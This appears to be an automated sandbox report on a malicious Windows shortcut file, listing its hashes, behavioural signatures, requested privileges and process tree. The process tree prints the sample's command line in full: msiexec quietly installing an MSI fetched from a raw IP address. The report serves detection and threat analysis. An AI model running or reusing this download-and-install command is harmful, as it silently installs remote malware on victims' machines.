Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
60s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
07/06/2023, 02:45
Static task
static1
Behavioral task
behavioral1
Sample
baff93a9574ff019ad8a1cff0b712d6f.lnk
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
baff93a9574ff019ad8a1cff0b712d6f.lnk
Resource
win10v2004-20230220-en
General
-
Target
baff93a9574ff019ad8a1cff0b712d6f.lnk
-
Size
2KB
-
MD5
baff93a9574ff019ad8a1cff0b712d6f
-
SHA1
bf927b871abbc068b7030e0e7b79797fa7bce59d
-
SHA256
fb48b9102388620bb02d1a47297ba101f755632f9a421d09e9ab419cbeb65db8
-
SHA512
37c94879618003ef04c96c3e63f37f91a80393bdf220a7e6522a7f5a4cd46badc6542499c916d0a348c453125377ae9698d392ee2c79162da89e629f8ac95e2a
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 8 2068 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation cmd.exe -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 4688 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 32 IoCs
description pid Process Token: SeShutdownPrivilege 4688 msiexec.exe Token: SeIncreaseQuotaPrivilege 4688 msiexec.exe Token: SeSecurityPrivilege 2068 msiexec.exe Token: SeCreateTokenPrivilege 4688 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4688 msiexec.exe Token: SeLockMemoryPrivilege 4688 msiexec.exe Token: SeIncreaseQuotaPrivilege 4688 msiexec.exe Token: SeMachineAccountPrivilege 4688 msiexec.exe Token: SeTcbPrivilege 4688 msiexec.exe Token: SeSecurityPrivilege 4688 msiexec.exe Token: SeTakeOwnershipPrivilege 4688 msiexec.exe Token: SeLoadDriverPrivilege 4688 msiexec.exe Token: SeSystemProfilePrivilege 4688 msiexec.exe Token: SeSystemtimePrivilege 4688 msiexec.exe Token: SeProfSingleProcessPrivilege 4688 msiexec.exe Token: SeIncBasePriorityPrivilege 4688 msiexec.exe Token: SeCreatePagefilePrivilege 4688 msiexec.exe Token: SeCreatePermanentPrivilege 4688 msiexec.exe Token: SeBackupPrivilege 4688 msiexec.exe Token: SeRestorePrivilege 4688 msiexec.exe Token: SeShutdownPrivilege 4688 msiexec.exe Token: SeDebugPrivilege 4688 msiexec.exe Token: SeAuditPrivilege 4688 msiexec.exe Token: SeSystemEnvironmentPrivilege 4688 msiexec.exe Token: SeChangeNotifyPrivilege 4688 msiexec.exe Token: SeRemoteShutdownPrivilege 4688 msiexec.exe Token: SeUndockPrivilege 4688 msiexec.exe Token: SeSyncAgentPrivilege 4688 msiexec.exe Token: SeEnableDelegationPrivilege 4688 msiexec.exe Token: SeManageVolumePrivilege 4688 msiexec.exe Token: SeImpersonatePrivilege 4688 msiexec.exe Token: SeCreateGlobalPrivilege 4688 msiexec.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 616 wrote to memory of 4688 616 cmd.exe 85 PID 616 wrote to memory of 4688 616 cmd.exe 85
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\baff93a9574ff019ad8a1cff0b712d6f.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i http://185.166.217.184/JDXFHUIPGYN98P5GY87S43BF5TW4IYNP/attachment.msi /quiet2⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:4688
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2068